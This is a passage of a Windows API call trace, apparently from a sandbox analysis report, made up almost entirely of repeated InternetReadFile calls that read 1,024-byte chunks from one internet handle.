lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.132] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.133] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.135] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.135] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.135] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.138] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.138] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.218] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.218] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.218] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.221] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.267] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.267] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.267] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.267] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.267] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.267] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.269] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.271] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.276] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.276] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.276] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.276] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, 